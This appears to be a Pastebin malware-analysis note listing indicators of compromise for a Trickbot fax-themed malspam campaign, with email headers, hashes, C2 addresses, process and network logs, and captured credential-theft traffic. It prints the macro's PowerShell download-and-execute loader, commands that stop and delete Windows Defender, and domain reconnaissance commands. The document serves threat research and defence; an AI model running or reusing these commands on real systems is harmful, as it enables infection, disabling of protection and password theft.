Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Trickbot #W97M #macro #powershell
- https://pastebin.com/75KNqwCf
- https://radetskiy.wordpress.com/?s=trickbot
- https://myonlinesecurity.co.uk/trickbot-via-new-fax-message-malspam/
- shema
- --------------
- email > attach (doc) > macro > powershell > GET 2URL > \AppData\Local\Temp\which.exe
- email_headers
- --------------
- Received: from confidentialfax.com ([95.211.242.199])
- by mail1.victim.com for <user1@org1.victim.com>;
- Fri, 5 Oct 2018 13:45:12 +0300 (EEST) (envelope-from noreply-user1=org1.victim.com@confidentialfax.com)
- Received: by confidentialfax.com id hmt0jtcpsj86 for <user1@org1.victim.com>;
- Fri, 5 Oct 2018 06:29:00 -0400 (envelope-from <noreply-user1=org1.victim.com@confidentialfax.com>)
- Subject: New fax message
- From: "Confidential Fax" <noreply@confidentialfax.com>
- Date: Fri, 5 Oct 2018 06:29:00 -0400
- To: user1@org1.victim.com
- files
- --------------
- SHA-256 03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2
- File name Fax.doc
- File size 63 KB
- SHA-256 b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a
- File name ch.rome !This program cannot be run in DOS mode.
- File size 557.3 KB
- SHA-256 6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c
- File name radiance.png !This program cannot be run in DOS mode.
- File size 492 KB
- SHA-256 3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22
- File name table.png !This program cannot be run in DOS mode.
- File size 492 KB
- macro
- --------------
- powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''C:\Users\admin\AppData\Local\Temp\which.exe'');start-process ''C:\Users\admin\AppData\Local\Temp\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\symbol.bat; start-process 'C:\Users\admin\AppData\Local\Temp\symbol.bat' -windowstyle hidden"
- payload_sources
- --------------
- 107.180.51.22 pixandflix{.} com/ch.rome
- 107.180.51.22 wedannouncements{.} com/ch.rome
- activity
- **************
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""function need([string] $qqqqq){(new-object system.net.webclient).downloadfile($qqqqq,''%tmp%\which.exe'');start-process ''%tmp%\which.exe'';}try{need(''h11p: \pixandflix{.} com/ch.rome'')}catch{need(''h11p: \wedannouncements{.} com/ch.rome'')}'"" | out-file -encoding ascii -filepath %tmp%\symbol.bat; start-process '%tmp%\symbol.bat' -windowstyle hidden"
- C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\symbol.bat" "
- "C:\tmp\which.exe"
- C:\Windows\SysWOW64\cmd.exe
- /c sc stop WinDefend
- /c sc delete WinDefend
- /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Users\operator\AppData\Roaming\AMNI\which.exe
- C:\Windows\SysWOW64\cmd.exe
- /c sc stop WinDefend
- /c sc delete WinDefend
- /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Windows\system32\svchost.exe
- C:\Windows\system32\cmd.exe
- /c ipconfig /all
- /c net config workstation
- /c net view /all
- /c net view /all /domain
- /c nltest /domain_trusts
- /c nltest /domain_trusts /all_trusts
- C:\Windows\system32\svchost.exe
- netwrk
- --------------
- 107.180.51.22 pixandflix.com GET /ch.rome HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
- 185.17.123.2 185.17.123.2 GET /radiance.png HTTP/1.1 no User Agent !This program cannot be run in DOS mode.
- 185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
- 185.17.123.2 185.17.123.2 GET /table.png HTTP/1.1 WinHTTP loader/1.0 !This program cannot be run in DOS mode.
- 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
- 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1 Mozilla/4.0
- 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/90 HTTP/1.1 test
- 37.128.229.30 37.128.229.30 POST /ser1005/APM11_W617601.idxxxxxx/81/ TTP/1.1 Mozilla/4.0
- comp
- --------------
- powershell.exe 1568 107.180.51.22 80 ESTABLISHED
- svchost.exe 2976 47.52.62.55 443 ESTABLISHED
- svchost.exe 2976 192.252.209.44 443 ESTABLISHED
- svchost.exe 2976 2.21.89.57 80 ESTABLISHED
- svchost.exe 2976 82.146.41.218 447 ESTABLISHED
- svchost.exe 3136 200.29.24.36 8082 SYN_SENT
- svchost.exe 3384 185.17.123.2 80 ESTABLISHED
- svchost.exe 3136 24.130.135.200 80 SYN_SENT
- svchost.exe 420 77.37.142.203 8082 SYN_SENT
- svchost.exe 3136 177.0.69.68 80 SYN_SENT
- svchost.exe 3136 107.175.247.166 443 SYN_SENT
- svchost.exe 3136 172.81.135.139 443 SYN_SENT
- svchost.exe 3136 200.29.24.36 8082 SYN_SENT
- persist
- --------------
- Task Scheduler
- \Msnetcs c:\users\operator\appdata\roaming\amni\which.exe 05.10.2018 10:59
- stealing_passwd
- **************
- POST /ser1005/APM11_W617601.idxxxxxx/81/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/4.0
- Host: 37.128.229.30
- -----------DEAFJJDLMELQCBHP
- Content-Disposition: form-data; name="data"
- http://www.i.ua|oper|****** (saved passwd)
- https://www.ukr.net|11oper|****** (saved passwd)
- https://accounts.google.com|oper11.wdma@gmail.com|****** (saved passwd)
- https://login.live.com|oper11.wdma@gmail.com|****** (saved passwd)
- -----------DEAFJJDLMELQCBHP
- Content-Disposition: form-data; name="source"
- firefox passwords
- -----------DEAFJJDLMELQCBHP--
- (!) ff only, no chrome
- get_sys_info
- **************
- POST /ser1005/APM11_W617601.595544C8808D034FD9E85B5C4F5C2BEB/90 HTTP/1.1
- Content-Type: multipart/form-data; boundary=Arasfjasu7
- User-Agent: test
- Host: 37.128.229.30
- --Arasfjasu7
- Content-Disposition: form-data; name="proclist"
- ***PROCESS LIST***
- [System Process]
- System
- smss.exe
- csrss.exe
- wininit.exe
- csrss.exe
- winlogon.exe
- . . .
- --Arasfjasu7
- Content-Disposition: form-data; name="sysinfo"
- ***SYSTEMINFO***
- Host Name - APM11
- OS Name - Microsoft Windows 7 ..........................
- OS Version - Service Pack 1
- OS Architecture - 64-bit
- Product Type - Workstation
- Build Type - Multiprocessor Free
- Registered Owner - operator
- Registered Organization -
- . . .
- /c ipconfig /all
- /c net config workstation
- /c net view /all
- /c net view /all /domain
- /c nltest /domain_trusts
- /c nltest /domain_trusts /all_trusts
- # # #
- https://www.virustotal.com/#/file/03456acb1cd591086282e3356a2978cb95de1ed5d17c00ce982e391c92efdbd2/community
- https://www.virustotal.com/#/file/b769c3aff961c8a3db3884d5470560d1ba23f1d4d7ff062c899fca1d3829c30a/community
- https://www.virustotal.com/#/file/6b58797cbdbe8afc9a93230bd8275202d88c94c10aa051721908ec31deea9c8c/detection
- https://www.virustotal.com/#/file/3558a4b7210b316afcd175c072b11bed5662296082b3d5c0a8b82c4d9a393f22/detection
- https://analyze.intezer.com/#/analyses/0a02c369-9b18-4711-ba78-cb38aaed2184
- https://analyze.intezer.com/#/analyses/d2aea4cc-8c6c-4f60-80e1-e946b5f14f64
- https://analyze.intezer.com/#/analyses/7f767ab6-9865-441e-a9de-9bdd7c4c6bff
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement